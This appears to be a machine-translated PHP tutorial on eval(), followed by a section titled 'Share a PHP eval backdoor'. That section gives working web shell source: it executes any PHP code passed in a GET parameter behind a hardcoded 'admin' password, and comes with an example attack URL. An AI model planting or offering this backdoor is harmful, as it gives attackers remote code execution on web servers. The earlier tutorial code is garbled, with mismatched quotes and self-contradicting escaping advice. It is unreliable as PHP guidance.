Code:
Copy Code code as follows:
Eval ("Echo ' Hello World;");
The top code is equivalent to the following code:
echo "Hello World";
Output in the browser: Hello World
Use eval () to note several points:
The string at the end of the parameter of the 1.eval function must have a semicolon, plus a semicolon at the end (this semicolon is a PHP restriction)
2. Note the use of single quotes, double quotes and backslashes. If there is a variable in the parameter, and the variable has an assignment operation, the $ symbol before the variable must have \ to escape. If there is no assignment operation you can do without.
Code:
Copy Code code as follows:
$a = 100;
Eval ("echo$a;");
Because there is no assignment operation, you can escape $ without \. Equivalent to the following code:
Copy Code code as follows:
$a = 100;
Eval ("echo\ $a;")
3. Note that you must have double quotes on either side of the command string (including semicolons) or single quotes as needed. Otherwise the error.
A command string is a time when commands such as Echo and print are included in a string.
If the argument has only one variable, you can use it. For example:
Copy Code code as follows:
$func =<<<func
function Test () {
echo "Test eval function";
}
FUNC;
eval ($func);
Test ();
Share a PHP eval backdoor
Request must support Eval function
How to use
Http://url/test.php?pwd=admin&action=eval&a=phpinfo ();
Copy Code code as follows:
<?php
$passwd = "admin"; if ($_get[' pwd ']!= $passwd) exit;
if ($_get[' action ']== ' eval ' && $_get[' a ']) {eval ($_get[' a ']);}
?>